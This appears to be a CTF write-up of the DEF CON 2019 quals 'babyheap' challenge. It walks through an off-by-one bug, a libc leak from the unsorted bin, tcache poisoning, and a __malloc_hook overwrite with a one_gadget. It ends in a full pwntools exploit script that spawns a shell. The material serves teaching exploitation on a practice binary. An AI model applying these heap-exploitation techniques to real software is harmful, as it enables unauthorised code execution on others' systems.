Defcon quals CTF - Babyheap

June 29, 2020 3774 words 18 minutes

Contents

Working through the babyheap challenge from defcon 2019 quals to exploit an off-by-one vulnerability and abusing the tcache to gain a shell.

The files for this ctf can be found here.

Start

From my background as a malware analyst, I like getting a good static understanding of the binary before running it.

We can see in the main function that it is made up of a simple loop that accepts commands using the read function. The read function reads just 1 byte and 1 terminating character. The accepted command characters are {'F', 'E', 'M', 'S'}.

E seems to exit the program.
M seems to allow us to add an allocation to an array. The allocations will fall into either the 0xF8 size or 0x178 size category.
F seems to zero and free the allocation of our choice. It also tells us the array can hold 10 (0-9) allocations.
S seems to print the contents of the allocation

Just your standard heap challenge command interface type of deal really.

Detailed functionality

It might be a good idea to start by looking at M’s functionality as it serves as a basis for the other 2 commands.

[M] alloc

Looking at the start of M we can infer that each array entry is a struct of 0x10 bytes with something non-zero in the first 8 bytes indicating whether the entry is present or not:

We can slso see that, from here on, EBP will be used to give the current index inside of the array. In the next block we get to give a size for our allocation:

We note that r12d is the size we entered and that 1 is subtraced from that number and put inside of eax. Our allocations are then divided into 2 categories:

Any size below or equal to 0xF8 gets a 0xF8 sized allocation
Any size from 0xF8 up to 0x178 inclusive gets a 0x178 sized allocation

After the allocation is made we use our stored index inside of ebp to index the current array entry and load our allocated pointer into the first 8 bytes of our 16 byte array entry.

The last part of the function sets our given allocation size in the seconds 8 bytes of our index entry. After that it loops for size amount of times or until a newline is encountered while reading 1 character at a time from stdin into our allocation:

If we look closely we can see that the loop has a slightly strange structure as it does 1 iteration of the loop before the loop has even started and it doesn’t increment the i accordingly. So maybe the loop looks something like:

i = 0;
do
{
	//read 1 byte into buffer
} while (i++ < size);

So if size were to be 1 we would have the following execution:

i = 0; 1 byte read; 0 < 1; i = 1;
i = 1; 1 byte read; 1 < 1; end loop

As you can see there are 2 bytes read, despite the size being 1! This could very well be our initial way in.

[F] ree

The next most interesting function is the function that frees the allocated chunks. As it is a very short function ill paste it here in its entirety

We can give it a number between 0 and 9 as an index into the struct array. If the first 8 bytes of that entry isn’t 0 we will attempt to free it, otherwise we will error. Before freeing we also make sure to set the entire buffer, using the size field of the array entry, to 0 and then set the array entry itself to 0.

As the buffer is zeroed out based on the size argument and we’ve seen that we can write 1 byte past the size, we know that we can leave 1 byte intact after each alloc+free. If we allocate the right sizes in the right order we could end up getting memory that still contains 1 dirty byte from a previous allocation.

This will most definitely be the way to attack this binary!

[S] how

This function isn’t too important for now it seems. It just contains functionality to print out the buffer we allocated earlier:

As there is no bounds check on the print, we might be able to read past the end of our buffer or somehow leak interesting information. This will come back later.

Exploitation

In order to start trying to exploit this vulnerability it’s probably a good idea to spend a bit of time automating the process using pwntools. The following script allows us to talk to the program programmatically:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


from pwn import *

exe = context.binary = ELF('./babyheap')
proc = process(context.binary.path)
# libc = ELF('./libc.so')

def F(i):
	proc.sendlineafter("> ", "F")
	proc.sendlineafter("> ", str(i))

def S(i):
	proc.sendlineafter("> ", "S")
	proc.sendlineafter("> ", str(i))
	return proc.recvline()

def M(sz, buf):
	proc.sendlineafter("> ", "M")
	proc.sendlineafter("> ", str(sz))
	proc.sendlineafter("> ", buf)

M(10, "test")
S(0)
F(0)

proc.interactive()

info leak

From here on out we will need to know a bit more about how the linux memory manager works: https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/

In order to do anything in this challenge we need a clue of where things are positioned in memory, libc in particular. For this we will use:

The fd and bk ptr in a freed chunk in the unsorted bin
The order in which the memory manager frees and allocates

As described in the blog above, when a chunk gets put into the unsorted bin it gets doubly linked into the unsorted bin list. This means that at the beginning of the freed chunk a forward and backward pointer are inserted. These pointers, if no other unsorted chunks are present, will point to the unsorted bin’s list head. This head is located inside of the main_arena area of libc and thus we will have a pointer to a deterministic position inside of libc.

Now in order to get our chunk into the unsorted list to begin with, we need to follow the steps as described at the bottom of the blog in the free strategy section. To end up in the unsorted list we need to free a chunk larger than fastbin size but smaller than 64KB, it shouldn’t be near the top chunk (or it will get coalesced into it) and it shouldn’t be able to fit inside of any of the tcache slots.

The max fastbin size is 0x88, I believe, so we won’t run into any problems with our 0xF8 or 0x178 sized allocations. We should make sure to create 1 ending “guard” allocation at the end of any allocations we make to prevent our allocations from getting coalesced into the top chunk upon freeing. Last but not least we need to fill up the 7 slots of the tcache of that same size, before any chunk we free will actually end up in the unsorted list.

This will give us the following steps to go through for us to put a freed chunk of our choice into the unsorted bin:

Allocate 7 0x178 chunks for the tcache
Allocate 1 chunk that will end up in unsorted
Allocate 1 or 2 “guard” chunks
Free first 7 chunks to fill tcache
Free 8th chunk to put it into unsorted bin

We can add this code to our test exploit:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


for i in range(7):
	M(0x178, "tcache filler")

M(0x178, "unsorted")
M(0x178, "end")
M(0x178, "end")

pause()

for i in range(8):
	F(i)

pause()

In the following screenshot we can see that we have allocated 10 consecutive chunks onto the heap:

After freeing them we can see that our tcache now contains 7 of those chunks and the unsorted bin contains the 8th:

Now for us to get access to the bk and fd pointers that should point to libc, we need to allocate a chunk that will be taken from the unsorted bin. In order to do this we can look at the blog again, near the bottom it explains the order in which allocations are resolved. The only real thing we need to pay attention to here is that our allocation isn’t taken out of the tcache. To prevent the memory manager from giving us a tcache chunk we need to request a chunk size different from the chunk size that is loaded inside of the tcache. Leaving us with only 1 option, we allocate a chunk that is 0xF8 in size. This will bypass the tcache and request a chunk from the unsorted bin. The chunk that is in the unsorted bin will get split into 2, to match the size we requested, and then served to us. It is important to note that the memory manager doesn’t zero out the metadata inside of the freed chunk before serving it. This is what gives us the pointer leak into libc. We add the following to our testing exploit to request that chunk:

1
2
3


M(0xF8, "") 

pause()

In the below screenshot we can see that the tcache still contains 7 entries after we allocate our 0xF8 sized chunk and the unsorted bin now only contains 1 0x80 sized chunk. As we’ve taken the 0x100 byte sized chunk for ourselves:

This shows the state of memory after running the entire test script, note that the 0x100 byte chunk still contains 2 pointers despite us having allocated it already:

Now if we add this code to our test exploit we will be able to get the pointer that points to the main_arena in libc:

1
2
3


unsorted_list_head_ptr = u64(S(0).ljust(8, "\x00"))

print("leaked libc addr: 0x%08X" % unsorted_list_head_ptr)

This calls the S() show command on index 0, which is the index of the allocation of 0xF8 bytes that we just made. After that we use the u64() unpack 64bit ptr function from pwntools to interpret the raw little endian bytes into ascii. The ljust is necessary, because u64 expects a string of 8 bytes which the output of the show command isn’t.

To make sense of this pointer we can use gdb again in combination with the output of the show command we just built into our script. We break again using pause(), this time after we’re done printing the leaked address out to stdout. For me it looks like this:

When we get our output, issue ctrl+c to gdb to break into the process and use x/gx to show the symbol for whatever that pointer is pointing to:

As you can see it points to somewhere in the main_arena symbol, which is part of libc. If we were to look up the main_arena struct in the linux source, we would probably find that it contains the list head for the unsorted bin. We can safely assume that this offset is constant across restarts on the same libc version. This gives us a reliable pointer to somewhere into libc. Now, this pointer is slightly cumbersome to work with, so we would like to obtain the libc base. In the same gef instance we can use the vmmap command (I believe it’s info modules in vanilla gdb?) and find out where libc is located in this run:

The highlighted part is the base of libc and we can see that our earlier pointer 0x7FDE779D9E10 falls somewhere inside of it. Now to calculate the libc base from our pointer dynamically, we need to know its offset from the base, which is:

0x7FDE779D9E10 - 0x00007fde777f5000 = 0x1E4E10

Giving us the following addition to our code:

1

libc_base = unsorted_list_head_ptr - 0x1E4E10

And with that we have the info leak completed.

tcache poisoning

Now that we have the first 2 critical pieces to the puzzle (libc_base and an off by 1 vulnerability), we can start planning our attack. We will use the following test code to illustrate the off-by-1 size overwrite:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


M(0x178, "reduce tcache to 6 entries")

for i in range(3):
	M(0xF8, "XXXX")

F(4)
F(2)

M(0xF8, "A" * 0xF9)

pause()

First we open up 1 spot inside of the tcache for size 0x178. After that we allocate 3 chunks of 0xF8 bytes in size, which is the minimum needed to implement this way of exploiting the tcache. We will use the 2nd chunk of the 3 to poison the tcache which is then used to overwrite a pointer in the 3rd chunk. The first chunk we allocated here will be used to overwrite the size of the 2nd chunk using our off-by-1. We free the 3rd and 1st chunk and then allocate a chunk again. This allocation will fill up the spot of the just freed chunk at index 1, preceding the chunk whose size field we wish to overflow. Into this chunk we will then put 1 byte more than it is supposed to be able to handle which should overwrite the first byte of the malloc metadata of the next chunk.

Inside of gdb we can show the result of this:

According to our script the chunk containing "XXXX" should be of size 0xF8 (or 0x100 including metadata), however the LSB got overwritten by an A from the previous chunk giving us a size of 0x140 (ignoring the flags). Now that we know that works as it is supposed to, we should overwrite the size field with a more useful value that will put it back into a tcache bin of our choice. In this case only the tcache bin of size 0x178 makes sense as that’s that only other size we can allocate.

If we follow that plan of attack we will see our chunk, that was originally of size 0xF8, appear in the tcache bin for chunks of sizes 0x178! Now why is this exploitable?

This is where the 3rd chunk we allocated earlier comes in. We allocated 3 chunks of size 0xF8, which are located adjacent to eachother on the heap, and then freed the 3rd and 1st. Upon freeing the 3rd chunk the memory manager introduced some pointers at the start of the now freed buffer for keeping track of freed chunks, etc. This will be important in a moment. We also just freed a chunk of size 0xF8 to the tcache bin of size 0x178. When we now request a chunk from the tcache, it will put that chunk back in the exact same position from which it got freed. So if we request a chunk of size 0x178 it will take the first available chunk in that tcache bin and give it back to us. In this case we used an off-by-one to put a chunk thats supposed to only cover 0xF8 bytes into the tcache for chunks of size 0x178. Now when we request that chunk it will get put right back into the gap between our other 2 0xF8 allocations. As we had created 3 consecutive 0xF8 allocations and replaced the middle one with an allocation of size 0x178 without moving the last chunk forward, we now have the middle chunk partly overlayed over the last chunk. We are now able to overwrite the first 0x178 - 0xF8 bytes of the last chunk by writing to the 2nd chunk.

To illustrate:

Alloc 3 chunks with “XXXX” (remember the pointer of the last chunk 0x55bb44a6a360)

Free chunk 3 and chunk 1, allocate chunk 1 and overwrite the size of chunk 2 with 0x81 (0x80 to get it into the right bin and 1 to set the right flag)

Free the corrupted chunk so it ends up in the tcache again ( which should fill back up to 7 entries, see our pointer from the previous overwritten chunk 0x55bb44a6a260)

Allocate a chunk from that tcache which will put it back into the place it was before, overlapping the 3rd chunk (we should see 0xACEACEACEACEACEA being written to the metadata of chunk 0x55bb44a6a360, the ptr we wrote down earlier)

We have successfully taken control over a pointer in a freed chunk. What this pointer is and what we will do with it we will see in the next paragraph.

Write what where

We’ve seen above that we can manage to overwrite a pointer inside of a freed chunk in the tcache, but what does this really mean? Before we continue looking into how this can be abused let’s first look at the definition of a tcache entry and what it will look like in memory while a freed chunk is inside of the tcache. In the following screenshot from the malloc.c src you can see that each entry in the tcache gets a tcache_entry struct overlayed over the start of the data area, much like a normal freed chunk. This tcache_entry contains a next pointer to the next entry in that particular tcache bin giving us a singly linked list:

When overlayed over a freed chunk. it will look like this (illustrated using Microsoft Paint™):

So when we were previously overwriting data past our 0xF8 chunk boundary (because we were able to allocate a fake 0x178 sized chunk), we were overwriting the metadata and next pointer of the next chunk that was still in the tcache. How could we potentially exploit this? As the single linked list of a tcache bin is used to serve us a memory chunk you can overwrite the next pointer to point to any arbitrary address and get a pointer to it from malloc.

This gives us a write what where condition as we can point malloc anywhere we want and write to it using the pointer provided to us. Given this, there are many ways to get from here to a shell. It seems common now-a-days to overwrite one of these 3 symbols located at a static address in libc:

__realloc_hook
__malloc_hook
__free_hook

If we look at the malloc.c source file again we can see that these hooks are first checked if theyre not NULL and then called at the start of their respective functions:

In order to find the offset of __malloc_hook, or any other hooks for that matter, you can go into gdb and dump __libc_malloc and the pointer to the location of __malloc_hook will be held inside of the pointer at the start (if you follow the jump you will see the pointer get called):

Alternatively you can issue this command if you have symbols:

Getting the offset is then as easy as subtracting libc base that we obtained earlier from the pointer where the hook is stored and we can use the offset in our exploit.

This can be legitimately used for debugging purposes or other reasons why you would be altering the behavior of one of those functions, but in this case it gives us a really easy way to get any pointer of our choosing get called. This pointer of our choice could be shellcode we’ve got stored somewhere that has execute rights or any other common way to pop a shell. In this case I’ll be going with a onegadget which pops a shell with just 1 call (given that certain constraints are met).

Bringing it all together

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114


from pwn import *

# Let pwntools know where the binary is
#   and start it as a process
exe = context.binary = ELF('./babyheap')
proc = process(context.binary.path)

# Offset for the __malloc_hook symbol in libc
malloc_hook_offset = 0x1e4c30

# gdb.attach(proc)

def F(i):
	proc.sendlineafter("> ", "F")
	proc.sendlineafter("> ", str(i))

def S(i):
	proc.sendlineafter("> ", "S")
	proc.sendlineafter("> ", str(i))
	return proc.recvline()

def M(sz, buf):
	proc.sendlineafter("> ", "M")
	proc.sendlineafter("> ", str(sz))
	proc.sendlineafter("> ", buf)


#############################################
################ INFO LEAK ##################
#############################################

# Filling up the tcache
for i in range(7):
	M(0x178, "tcache filler")

# Allocate the chunk that will end up in unsorted bin
M(0x178, "unsorted")

# Guard chunks
M(0x178, "end")
M(0x178, "end")

# Free 7 tcache filler chunks to fill up the tcache
#   free the 8th chunk which ends up in the unsorted bin
for i in range(8):
	F(i)


# Malloc a chunk different than the size of the filled
#	tcache to force malloc to take a chunk from the
#	unsorted bin
M(0xF8, "") 


# Reading out the chunk we just allocated will reveal
#	that there's a pointer to the libc unsorted bin
#	doubly linked list list head still sitting there
unsorted_list_head_ptr = u64(S(0)[:-1].ljust(8, "\x00"))


# We looked up where the unsorted bin's head is relative
#	to libc's base address, this way we can dynamically
#	calculate libc's base address using this leaked ptr
libc_base = unsorted_list_head_ptr - 0x1E4E10



#############################################
############## TCACHE POISONING #############
#############################################

# Free up 1 slot in the tcache
M(0x178, "reduce tcache to 6 entries")


# Set up the 3 chunks we need for poisoning the tcache by
# 	overwriting the size field of a chunk using our
#	off-by-one vulnerability
for i in range(3):
	M(0xF8, "XXXX")

F(4)
F(2)


# We can write 1 extra byte, overwriting the LSB of the size
#	field of the next chunk's metadata. This changes the size
# 	from 0x100 to 0x180 putting it in the wrong tcache when freed
M(0xF8, ("A" * 0xF8 + "\x81"))
F(3)


# Use the fact that our program thinks we have a 0x178 sized allocation
#	while the system thinks we only have a 0xF8 sized allocation to
#	overwrite the metadata of an adjacent tcache chunk with the ptr to
#	__malloc_hook
M(0x178, "C" * 0x100 + p64(libc_base + malloc_hook_offset).strip("\x00"))


# Allocate one chunk before we get to the chunk that points to __malloc_hook
M(0xF8, "")

# Write a one gadget into the allocation that points to __malloc_hook, causing
#	the system to execute our pointer when we next call malloc, giving a shell 
one_gadget = libc_base + 0xe2383
M(0xF8, p64(one_gadget).strip("\x00"))


# Initiate a call to malloc to pop our shell
M(0xF8, "win")


# Interact with our shell
proc.interactive()